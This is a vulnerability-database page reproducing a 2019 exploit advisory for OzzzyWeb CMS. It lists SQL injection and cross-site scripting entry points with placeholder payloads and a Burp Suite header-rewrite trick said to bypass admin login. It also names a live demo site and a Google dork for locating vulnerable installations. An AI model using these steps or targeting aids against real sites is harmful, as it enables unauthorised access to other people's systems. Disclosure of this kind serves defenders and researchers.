OzzzyWeb CMS Multiple Vulnerabilities - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1809045 漏洞类型
发布时间 2019-11-03 更新时间 2019-11-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110013
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/***********************************************************************************
** Exploit Title: OzzzyWeb CMS Multiple Vulnerabilities
**
** Exploit Author:  z3r0fy
**
** Vendor Homepage : http://wwww.ozzzyweb.com/
**
** Download (Warez) : http://agrovipkimya.com/alfa.zip
**
** Google Dork : Copyright 2015 @ Ozzzy Akıllı Web Panelleri
**
** Tested on:  ParrotOS
**
** Demo : http://agrovipkimya.com/
**
************************************************************************************

WLB 1 : SQL Injection : 

http://vulnerabletarget.com/urundetay.php?=[SQL Payload]

Vulnerable COde : Line 367,365

----------------

WLB 2 : Cross Site Scripting :

http://vulnerabletarget.com/admin/sayfalar/dosya.php?urun_id=[XSS Payload]

Vulnerable Code : Line 95 , 19

-------------------------------

WLB 3 : Admin Authentication Bypass

http://vulnerabletarget.com/admin/anasayfa.html

PoC : 

Step 1 : Open Burpsuite 

Step 2 : Add Match And Replace Rule

Step 3 : and Add This Matchs

Type : Request Header
Match : 30[12] FOUND
Replace : 200 OK
COmment : Bypass

Step 4 : Reload /admin/anasayfa.html page..

***********************************************************************************
Twitter.com/z3r0fy
T.me/z3r0fy
***********************************************************************************